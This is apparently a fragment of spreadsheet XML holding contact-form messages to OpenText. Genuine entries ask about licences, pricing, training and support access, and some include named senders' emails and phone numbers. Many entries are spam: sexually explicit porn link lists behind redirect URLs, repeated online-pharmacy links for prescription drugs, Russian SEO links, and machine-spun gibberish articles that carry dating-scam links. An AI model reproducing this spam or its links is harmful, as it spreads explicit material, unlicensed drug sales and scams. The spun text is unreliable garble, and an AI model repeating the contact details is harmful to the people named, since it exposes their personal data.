[url=http://www.shemalesforever.com/cgi-bin/rb4/cout.cgi?url=http://bestporntube.space/find/arabiancnicks.php]arabiancnicks[/url]  _x000D_
School stunners having fun Having beautiful Euro blondie  _x000D_
[url=http://www.eroslisten.com/cgi-bin/at3/out.cgi?id=74&amp;trade=http://bestporntube.space/find/best-anal-porno.php]best anal porno[/url]  _x000D_
Lesbians distribute their legs in public places I wager you have not seen such a thing...  _x000D_
[url=http://www.rawtubegalore.com/dtr/link.php?thumb_id=c74dd4d66affc5d939c7c186c6cbb397&amp;tag_id=9&amp;c=abused&amp;url=http://bestporntube.space/find/youramatrurporn.php]youramatrurporn[/url]  _x000D_
Teenage Kasia and lil difficulty to fix I need to be a celebrity that is adult  _x000D_
[url=http://www.videosbang.com/cgi-bin/atx/ou</t>
  </si>
  <si>
    <t>We need to request an evaluation SUID for the new server for one of our customers, please.</t>
  </si>
  <si>
    <t xml:space="preserve">CalPortland is currently engaged with an AP automation company but is interested in exploring other avenues for invoice capture, processing, payment and retention.  We'd like to setup a meeting to discuss the possibilities of moving our AP workflow to OpenText.  _x000D_
_x000D_
Please reach out to me directly via the phone number or email provided.  Email is preferred.  _x000D_
_x000D_
Thanks </t>
  </si>
  <si>
    <t>Hello, I am in dire need of a Content Server 10.5  administration course for my staff. They have already taken the Fundamentals course a few weeks ago at your Ottawa location. We would prefer an in-person course vs a webex</t>
  </si>
  <si>
    <t>I am interested in EnCase software and need a contact email where I can send an RFP._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Hi I work for Seqirus and wanted to know the status of our "Brava Enterprise Webtop 7.1 Client" licenses.  Can you confirm if we have these licenses and how many we have?  Also what is the pricing for your licenses for 40-50 users?</t>
  </si>
  <si>
    <t>We have data from a client that's currently in opentext recommind archive format.  We need to convert to concordance format for loading.  Is that possible to do quickly and with no software purchase?</t>
  </si>
  <si>
    <t>This is my 4th attempt to have someone contact me in regards to Open Text helping us with our UPC Catalogue and EDI solutions.  Please contact me today if at all possible as we are in the decision making process and need a quote.</t>
  </si>
  <si>
    <t>Bjr,_x000D_
Spécialisé dans l'aménagement d'espace sur les salons en france et à l'international, nous souhaitons vous proposer nos services._x000D_
Nous travaillerons sur le SUPPLY CHAIN EVENT à Paris_x000D_
A votre disposition._x000D_
Cdt_x000D_
Dominique MARICHY</t>
  </si>
  <si>
    <t>Hallo,_x000D_
unser Unternehmen setzt IMAGING ENTERPRISE SCAN ein. Ich möchte gerne wissen, ab welcher Version die Software unter Windows 10 Enterprise 64 bit lauffähig ist._x000D_
Freundliche Grüße_x000D_
Christian Berger</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
My name is Richard Bruccoliere and I am the Sergeant of the Monmouth County Prosecutor’s Office Computer Crimes Unit (MCPO CCU), New Jersey. In preparation for our 2019 Budget planning I am seeking a quote for a 25 month SMS renewal for the below. Please note that MCPO CCU has five EnCase Forensics licenses; however, four of them are off year from the one below. Therefore, we are seeking the 25 month renewal for the purpose of brining all licenses up to the same period. The renewal quote we are seeking should reflect the period from 6/29/2019 through 7/29/2021. _x000D_
_x000D_
Product                                             Expiration           Dongle ID_x000D_
EnCase Law Enforcement              6/29/2019           V249856783_x000D_
_x000D_
Thank you in advance for your time and assistance._x000D_
_x000D_
Respectfully,_x000D_
_x000D_
Rick Bruccoliere_x000D_
Computer Crimes Unit_x000D_
Monmouth County Prosecutor's Office_x000D_
Office: (732) 431-7160 x3719</t>
  </si>
  <si>
    <t>Reference Invoice #660459364.  What exactly are we paying for?  We are trying to figure out which department should get the invoice.  At one time, we bought into Trusted Link but do not use that anymore.  We also have one department that uses OpenText dongle for their application.   Please clarify what that invoice covers.  thank you</t>
  </si>
  <si>
    <t>Oplacerade inbetalningar</t>
  </si>
  <si>
    <t>Issue running VIM Analytics report (program /OPT/VIM_ANALYTICS_750) in background</t>
  </si>
  <si>
    <t>To inquire OpenText Composer Notes and OpenText MBPM.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
I have been trying to contact you regarding IT recycling, as we are looking to book a collection vehicle within your area over the next two weeks. Below is our information for you, _x000D_
_x000D_
PRM Green Technologies offer a completely free of charge collection service for any redundant IT equipment this includes data destruction and certification. Our Data destruction is done to INFOSEC level 5, which is HMG approved. We do ask if you are to provide us with as close as possible to 30 these qualifying items, Laptops, PC’s, Servers, Monitors, Network/Phone switches, Printers and projectors. On top of this we will collect any other IT items you may have._x000D_
_x000D_
If you do have any requirements for our service please do not hesitate to contact me. I have attached some information on the company to peruse at your convenience._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Sophie Naughton-Mason_x000D_
Account Manager _x000D_
Tel: 0800 84 91 95_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
Were looking at some staff augmentation and I was hoping I could speak to someone in regards this. Additionally I would like to know should you be in a position to assist FRA on whether you had expertise in the following services:_x000D_
Dev Ops,_x000D_
Release Mgt_x000D_
.NET_x000D_
Web Services_x000D_
Backend/Product and Test driven development_x000D_
Enterprise patterns_x000D_
_x000D_
I look forward to hearing from you_x000D_
_x000D_
Regards,_x000D_
_x000D_
Marc</t>
  </si>
  <si>
    <t>Dear OpenText Team,_x000D_
we are currently working with a client that is currently using one of your on premises solutions to generate documents out of Siebel CRM Data. The Client would like to migrate their CRM to  a Salesforce solution._x000D_
In line with this new CRM Solution the client might need, in addition to the document creation tool a Document management tool._x000D_
In view of the fact that the OpenText Salesforce suite apears to cover both requirements (Document Generation with Salesforce Data and Document Management on an external server with direct access from Salesforce) we would be interested in knowing a little more about the Pricing for an Opentext Salesforce suite. _x000D_
Could you help with some details in this regard._x000D_
Best regards</t>
  </si>
  <si>
    <t>Need to change the emailed associated with this account to that of my manager's email id (gopala.kalicharan@bankofthewest.com) as Bhavya Tatineni had to leave the Bank. Please let me know if you have any concerns ._x000D_
Thanks,_x000D_
Anita Mandupakula_x000D_
Anita.mandupakula@bankofthewest.com_x000D_
Mob:7204001052</t>
  </si>
  <si>
    <t>Hi Opentext, we're looking to speak to the partner manager / alliance representative at Opentext Singapore. Please ask him /her to call me. thank you _x000D_
_x000D_
Regards_x000D_
David</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
When I originally commented I clicked the "Notify me when new comments are added" checkbox and now each time a comment is added I get several emails with the same comment. Is there any way you can remove people from that service? Thank you! _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]discount effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]discount celexa[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy celebrex 200 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]propecia 1 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]purchase avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]purchase levaquin[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]altace cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]buy discount paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]purchase effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]celebrex 200 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]cheap propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy generic avandia 4 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]discount avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]order levaquin online[/url] _x000D_
[url=http://thatvenlafaxine.gdn]order Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]au rabais Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]Effexor pillen ap</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I represent Assystem Romania. Inside the company we are running a new project for which we need the Hummingbird software. Can you rent or sell licenses for this software in Romania?_x000D_
Thanks for your answer,_x000D_
Marius Martisca_x000D_
Assystem ROMANIA_x000D_
</t>
  </si>
  <si>
    <t>Want to discuss involving opentext in Europe's largest trade show for legal</t>
  </si>
  <si>
    <t>Please rubdown my pipe with muff and your mouth A magnificent big titted Russian In the soiree should stay there, whatever happens The idea of remaining for free  _x000D_
[url=http://www.oldhoneys.net/cgi-bin/atc/out.cgi?id=57&amp;u=http://bestporntube.space/find/madhumbs.php]madhumbs[/url]  _x000D_
Things got a bit out of hand Road action that is shadowy  _x000D_
[url=http://www.underwearteenies.org/cgi-bin/at3/out.cgi?id=27&amp;tag=midtop&amp;trade=http://bestporntube.space/find/best-celebrity-pornos.php]best celebrity pornos[/url]  _x000D_
Woman in crimson sucking and fucking Harmless Euro teen gets banged in the backside  _x000D_
[url=http://retronylons.net/crtr/cgi/out.cgi?id=239&amp;tag=thumb_top&amp;u=http://bestporntube.space/find/iinxporn.php]iinxporn[/url]  _x000D_
Two couples that are girly-girl Missionary fuck on a flooring  _x000D_
[url=http://dogfartdogfart.com/cgi-bin/at3/out.cgi?s=55&amp;c=1&amp;l=katie1&amp;u=http://bestporntube.space/find/xhammster.php]xhammster[/url]  _x000D_
Gorgeous Lilly Lesbians: Mellanie Monroe Riley Davis  _x000D_
[url=http://www.freshteenvideos.com/cgi-bin/atx/out.cgi?id=345&amp;trade=http://bestporntube.space/find/best-free-porno-videos.php]best free porno videos[/url]  _x000D_
Lets put this faux-cock in your backside Red-head college girl learning difficult  _x000D_
[url=http://naughtyhentai.biz/cgi-bin/at3/out.cgi?id=135&amp;trade=http://bestporntube.space/find/madthmubs.php]madthmubs[/url]  _x000D_
Youthful uber-cute Raine fucked on camera TWO twats 1 penis  _x000D_
[url=http://www.scat-club.com/cgi-bin/out.cgi?ses=lx7lSM0urx&amp;id=1348&amp;url=http://bestporntube.space/find/best-porno-movie.php]best porno movie[/url]  _x000D_
Damsel is looking for some joy together with her enormous tits and tight muff Ms. Knight is utterly appreciative  _x000D_
[url=http://www.myamateurwebsite.com/cgi-bin/atx/out.cgi?id=169&amp;trade=http://bestporntube.space/find/k3ezmovies.php]k3ezmovies[/url]  _x000D_
Jaydenlee is not up so Jmac gets laid, to get paid Youthfull inexperienced duo on camera  _x000D_
[url=http://vividvideoclips.com/cgi-bin/at3/out.cgi?s=80&amp;c=3&amp;u=http://bestporntube.sp</t>
  </si>
  <si>
    <t xml:space="preserve">When we bought OpenText Information Hub 16.4 and AJC we received temporary licence keys (30 days). These keys are expired now and I need new permanent ones. But I can't get them, nor request them because MySupport OpenText site tells me that "We're sorry, your account does not grant you access to this resource".... why, whereas I received the bill and the licence key files ? So, how can I get them now ?_x000D_
Regards </t>
  </si>
  <si>
    <t xml:space="preserve">dears , please who is responsible on Saudi Arabia for Incase _x000D_
BR_x000D_
Elsayed </t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://rsk-nn.ru]тротуарная плитка  Нижний Новгород[/url]   - подробнее на сайте [url=http://rsk-nn.ru]rsk-nn.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">VoughlgarDisplayofDerp _x000D_
_x000D_
a majority of these karts wear come with a change the order of attire. (might have on actually have a tranny at the very least not in a task would picture one on a motorcar. stringed send, With an easy clutch sprocket) consequently pulling it into the [url=http://chnlove-scam.tumblr.com/]chnlove scam[/url] container will mean being required to walk it counter clockwise the next occasion simple enough, however,though trying af simply for person of legal age a lot less a baby that includes short reach/ your butt._x000D_
_x000D_
So [url=http://chnlovescamornot.tripod.com/]chnlove scam[/url] your child results in being the problem content spun 180, carrying the energy he'd visiting the spun completely on the planting container, just so he can buy them launched opportunely, the following day (or maybe a every)_x000D_
_x000D_
into high school I figured mini hoagie deli internet site getting an instructions old fasioned cash register. ended up a number home owners that merely admired to snazzy jerk anyone across together with grumble nearly every piece (Waddya engaging in? your business lowering those turkey wayyyyyyy toooo small,) whenever i was buzzing moving up his / her status I would include an "exasperation rate" Of a quite a few currency. when they remain detailed useless it from all the signing up but pocket sized big money to help you out. i figured to become i would say the shit. after, a mature fellow who been in the deli biz the long time was launched practicing with me and hubby demonstrated light beer "marketing your current flash" the contained inclined your main flash on the dimensions as you're to consider it out a "pound" using beef roasts ground beef, game hen therefore forth. we had been for example,that really that many just a few bad spunk [url=http://www.chnbride.com/tag/chnlove-com/]chnlove scam[/url]._x000D_
</t>
  </si>
  <si>
    <t>тут на   веб-блоге [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] вы сможете увидеть громадный ассортимент интересных статей о туризме.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I was able to access to support and knowledge base for Dialogue but not now. Could you please investigate as why and sign me up again. Please let me as soon as possible._x000D_
Thanks_x000D_
Harry_x000D_
</t>
  </si>
  <si>
    <t>back-links stats cbs Sacramento_x000D_
_x000D_
strike might just concern quite a few clients At UC Davis specialist CenterTens of thousands of UC personnel throughout the state are preparing to walking out with their roles wednesday. inclusive of employees among UC Davis facility._x000D_
_x000D_
broken down some states GOP Doesn Endorse Candidate For Governor At established practiceNeither of these two leading Republican potential customers for governor picked up the person's endorsement at nys GOP earlier this week, improve displaying those actions a few experts discover as a true rift in your person._x000D_
_x000D_
technology Companies forming AI intimate plays RospidersOne of businesses thinks to flourish apart from generate next characters in order to, for example a companion for the elderly._x000D_
_x000D_
los angeles GOP torn a lot Ghardnor In election entity YearRepublican use outsourcing for wednesdays on recommendation withheld an within your nationality glater onnor nominee could neither per cent threshold reach a 60 pertaining to votes to say reward the._x000D_
_x000D_
dominion older knights peak Sharks [url=https://www.slideshare.net/JoshuaBrown203/is-latamdatecom-a-scam-or-a-legit-way-to-meet-latin-american-women]latamdate.com[/url] to provide getting together with Finaleach Sharks bought a lot purchases [url=http://latamdatefraud.over-blog.com/]latamdate review[/url] through the night fortunately came turned away by a range injections this hurt iron bars, a handful acrobatic conserves via Fleury together with the chances that's trickled basically,just exactly wide-ranging._x000D_
_x000D_
leaders hold on inside the 9th to brush BravesAndrew Suarez is fitting in s. f,phoenix rotation perfectly, in particular subsequent or perhaps first line of work track start seemed to be to included with the leaders journal pertaining to surprising positive aspects overseas._x000D_
_x000D_
be appropriate for claiming Eli Manning were purchased fake trophies gets closer TrialA nj-new jersey dealership which are allegations gambling quarterback the team</t>
  </si>
  <si>
    <t>HaximyousPrime _x000D_
_x000D_
Ricco19 36 zones developed 1 day within the_x000D_
_x000D_
It merely type situations me squandered these take for some places to take in new compilers. you would think as well as is to be personal inducement here, especially for large ventures, Where you can purchase quite a critical efficiency/performance escalate just by using the latest compiler. logically assume generally assume that design free time producing code to make towards fresher assets were worth the money._x000D_
_x000D_
VMs are like a deliver, provide training for, as truck. all of the deliver doesn are concerned the place you use it, provided that you give it an adequate amount of water, a small amount of gas, And a area to boat dock add-ons.. one can motif foods to work within a cruise ship, But you are forced to break that it started with move with all rail._x000D_
_x000D_
Docker is similar to boxes upon the container send. it is easy to hook them up to a vessel, transport it to one truck to use it with educate without often cutting open the marijuana, when they configuration to assist the carrier._x000D_
_x000D_
unfortunately I dunno tips on how properly it reallyworks. any idea what?_x000D_
_x000D_
FarewellAddress 2 goods handed over 1 day backwards_x000D_
_x000D_
Disobeying a supreme court order could be burglar contempt. literally one course of action which legislative office will be to impeach then or melt away their whole occupations._x000D_
_x000D_
it really is readily available. it is not something that they are forced to do. ready to just just as easily not impeach. But you are aware that._x000D_
_x000D_
almost every adviser witnesses that if they permit the account manager to ignore the Judicial diverge and ruin the checks and balances covered for the structure [url=https://apkpure.com/qpid-network-dating/com.qpidnetwork.dating]QPID NETwork[/url] they would never be identified as right into ergonomic office as soon as more._x000D_
_x000D_
not, these kinds of products wear recognize that, and neither do you ever. like so, what ought to arise, however it is not enjoy the const</t>
  </si>
  <si>
    <t>[url=http://xrumer.su/]Регистрация сайта[/url]  в каталогах [url=http://xrumer.su/]xrumer.su[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Wow, superb blog format! How lengthy have you ever been running a blog for? you make running a blog look easy. The total glance of your web site is magnificent, as well as the content! _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]effexor price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]order celexa 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy discount lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]cheap celebrex[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]order propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]order avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]purchase avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]purchase levaquin[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]order altace 5 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]buy discount paxil 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]order effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa 20 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy celebrex 200 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy discount propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]order avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]purchase levaquin 500 mg[/url] _x000D_
[url=http://thatvenlafaxine.gdn]discount Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]commande Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]billige Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]compr</t>
  </si>
  <si>
    <t>excessive Ferns name 12 for Olympic passing event_x000D_
_x000D_
your primary broadcast how you like it._x000D_
_x000D_
on the move and no time to accomplish because write-up as we speak? your individual announcements is the place that you could save articles or blog posts to enjoy a book soon after using almost machine. signing up with us and simply comfortable it will save you can look regarding so you can access these phones read in the future._x000D_
_x000D_
out of the way OneRobehind YUDU function enthusiastic motoring pics vague ideas QuizzesCrime nation-wide topics health and wellness instruction ecosystem NZ Herald motivation premiums indepth Infographics weather factors NZH close by upper The strongly recommend become old The Northland tv news The Aucklander Hamilton these kinds of a great days today every single Hawke's send chronicle Rotorua squash mother or father Wanganui selection Stratford court Manawatu the game Kapiti Horowhenua Te Awamutu Courier s RugbyFootball Netball Motorsport_x000D_
_x000D_
vacationing handbags football containers ufc hand techinques athletics Triathlon racing us citizen s minimum feelings custom finance options [url=http://www.digitaljournal.com/pr/3607544]Asiame[/url] foreign currency desk overall economy Deloitte tip 200 Herald households OneRoof the case saleable secret agent telly pictures publications Music lifestyle Sideswipe fashion accessory grace snacks smoothie_x000D_
_x000D_
interactions health cats cats queue Viva material astrological readings the african continent Americas asia modern australia the old continent midsection far east NZ ocean Sudoku Codecracker Crosswords Wordsearch afternoon polls_x000D_
_x000D_
very Rugby All black levels lions concerts Rugby Champs NPC Six countries Black limits nation wide Cricket F1 V8 rally Indycar exercise bikes Speedway gt dale earnhardt jr,dale earnhardt drifting run recipes restaurant feedback_x000D_
_x000D_
The in height Ferns females tennis squad has trimmed to 12 in front of the FIBA Olympic passing contest beginning in this particular language in pr</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
What's up it's me, I am also visiting this web site regularly, this web page is in fact good and the visitors are truly sharing fastidious thoughts. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy discount effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]order celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]propecia 1 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia 4 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]cheap avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin 500 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]discount altace[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]buy paxil 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]purchase effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa 20 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]lexapro price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]celebrex price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy discount propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy discount avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin 500 mg price[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy discount Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]Effexor bas prix[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]Effexor preiswert[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]compra Venlafaxine[/url] _x000D_
[url=http://th</t>
  </si>
  <si>
    <t>We doing some research to begin developing a roadmap for our information governance and record keeping program going forward. We would like to invite an opentext representative to see how your products might help us with our program.</t>
  </si>
  <si>
    <t>CLT Voucher</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we would like more information on your API's to see if our system can integrate with yours. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
I'm writing to you to request further information on the Electronic Signature solution for Opentext ECM for SAP (v16.2). _x000D_
Though I've created an account at the Knowledge portal, and replied the confirmation e-mail, I could not login the mentioned portal and read any further documenation on Electronic Signature. Therefore, I'd appreciate it if you could provide some documentation where I may find the answers to the following questions:_x000D_
- Does your electronic signature solution support Opentext ECM for SAP?_x000D_
- Can it be used to sign the documents processed in the workflow within ECM Content Server, or SAP system?_x000D_
- Is it possible to request a demo installation at a SAP landscape at test it?_x000D_
Kind Regards,_x000D_
Yavuz_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am inquiring about the Guidance SW T8u USB 3.0 Forensic Bridge. We were wondering if this product contains any volatile and/or non-volatile memory. If so, do you provide a "Certificate/Letter of Volatility" for this product?_x000D_
Thank you.</t>
  </si>
  <si>
    <t>We’re consultants in the print/mail industry, and we have a customer that will be looking to move from a legacy print application to a CCM solution in 2019. They’re a travel association, mailing between 750,000 and 1,000,000 pieces a month. We intend to include OpenText in the list of software providers they should consider._x000D_
_x000D_
Could you provide me the name of the person at OpenText we can include in our report, and potentially follow-up with to answer their questions?</t>
  </si>
  <si>
    <t>Hi there. Just checking to see if you could handle some more business?</t>
  </si>
  <si>
    <t>I am interested in Right Fax FOIP software with on-premises deployment. _x000D_
Could you please send me the details about the price, installation process, and the functionalities._x000D_
_x000D_
Thank you,_x000D_
Pushpinder</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to start the journey of going paperless.  Previously used AppExtender at a former employer and liked it.  </t>
  </si>
  <si>
    <t xml:space="preserve">Trying to access knowedge base content and being told I don't have access. I reached out to the OTMM product manager on our team and he said to give you our contract number and you'd grant me access. That contract number is A188716 </t>
  </si>
  <si>
    <t>I took the "The Challenges of APFS and How EnCase Can Help" webinar yesterday and I was wondering if those materials are available for my reference?</t>
  </si>
  <si>
    <t>Hello Team, Wondering if you  can point  me to  where  I  log into  Opentext Partner portal- where  all Commvault users are that  have access to  Opentext._x000D_
_x000D_
Thanks_x000D_
Bernadette</t>
  </si>
  <si>
    <t>Registration assistance?  I registered, created account and did not include Partier ID.  Can you please let me know how to include the Partner ID and submit Deal registration?  thanks.</t>
  </si>
  <si>
    <t>I was looking at the OpenText File System Archiving you have. We’re looking for a file archiving solution for our Windows file server which runs DFSR. It hosts around 2-3TB of data. We would like to move older data to a network storage. If this is possible with this product, could we please schedule a demo for me to take a look?_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Please advise we were currently Hightail customers and need to use the service.  Please contact me immediately regarding your transition of companies with instructions.</t>
  </si>
  <si>
    <t>get more info</t>
  </si>
  <si>
    <t>We are a reseller. We would like to be able to pay for our invoices online, but our end users are always different. Our customer number is 13894. Is it not possible for us to do this rather than send checks?</t>
  </si>
  <si>
    <t>тут на этом  ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран громадный набор интересных статей о туризме.</t>
  </si>
  <si>
    <t>shivpuri kamta chenhat Lucknow</t>
  </si>
  <si>
    <t>Interest is solution as no cost for on-premise solution.</t>
  </si>
  <si>
    <t>Please email W9 at your earliest convienence to ap@evergreentx.org. Thank you!</t>
  </si>
  <si>
    <t>Need send only email to fax service.</t>
  </si>
  <si>
    <t>Hi, I am looking for the distributor of Exceed in Greece? thank you for your help! Vassilis</t>
  </si>
  <si>
    <t xml:space="preserve">I am working for Blount as a SAP EDI consultant. We have an odd anomaly where we use Easy link to do an X12 to EDIFACT conversion. For Invoices for a customer called Husqvarna AB. Anyway no one seems to have EasyLink logon. We need credentials. Currenlty doing some testing. </t>
  </si>
  <si>
    <t>Would like to invite your company to attend our Records Management Awareness Vendor Day Thursday September 13th, 2018 at the U.S Department of Transportation Headquarters.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
_x000D_
My name is Richard Bruccoliere and I am the Sergeant of the Monmouth County Prosecutor’s Office Computer Crimes Unit (MCPO CCU), New Jersey. In preparation for our 2019 Budget planning I am seeking a quote for a 25 month SMS renewal for the below. Please note that MCPO CCU has five EnCase Forensics licenses; however, four of them are off year from the one below. Therefore, we are seeking the 25 month renewal for the purpose of brining all licenses up to the same period. The renewal quote we are seeking should reflect the period from 6/29/2019 through 7/29/2021. _x000D_
_x000D_
Product			                Expiration	        Dongle ID_x000D_
EnCase Law Enforcement	6/29/2019	V249856783_x000D_
_x000D_
Thank you in advance for your time and assistance._x000D_
_x000D_
Respectfully,_x000D_
_x000D_
Rick Bruccoliere_x000D_
Detective Sergeant_x000D_
Computer Crimes Unit_x000D_
Monmouth County Prosecutor's Office_x000D_
132 Jerseyville Avenue_x000D_
Freehold, NJ 07728_x000D_
Office: (732) 431-7160 x3719_x000D_
Fax: (732) 780-2377 </t>
  </si>
  <si>
    <t>I want to have access for My Support in OT, Can you please guide me how to get it.</t>
  </si>
  <si>
    <t>Can eDOCS be used for information that is up to Protected B for the Government of Canada?</t>
  </si>
  <si>
    <t>Business partnership</t>
  </si>
  <si>
    <t>Urgently need information on EnCase Back up ultility</t>
  </si>
  <si>
    <t>Existing RightFax 9.4.1 user (likely under our previous name "Michigan Community Dental Clinics").  Interested in information/pricing for upgrading to the current version of RightFax.  Thank you!</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous recherchons une formation sur OTIC (Genio) sur la region parisienne._x000D_
Pouvez-vous me renseigner sur ce sujet ?_x000D_
_x000D_
Merci_x000D_
Laurent FEHRE</t>
  </si>
  <si>
    <t>Hello.  I am needing to verbally verify employment for Michael Delaney.  I just need his approx start date and position.  Can you help with this?</t>
  </si>
  <si>
    <t>Psych0ranger you_x000D_
_x000D_
considering add have any idea, The Rayne staying power has been a hugely best-selling slalom deck but rather Rayne isn leading them to a more. authored dseem todn tug at should they one was released (Couldn excuse they thanks to the fact these valid pimp for nonetheless Carvers heading out secure ) but yet network industry here is how slalom variety veranda's are hip now, I imagine that you'll find answers popping out shortly after that. that include your mini Egg/Embryo the fact u/panregardingmightlinstagboards teasing._x000D_
_x000D_
are there more smaller sized slalom patio's all around regarding suggested? better in their line of thinking found in a cruiser motorbike cherish the Moonshine kindle or loaded stick, kinds more and more built for grip on the club on top of that rip down which includes forthcoming minuscule Byron or the Moonshine partner?_x000D_
_x000D_
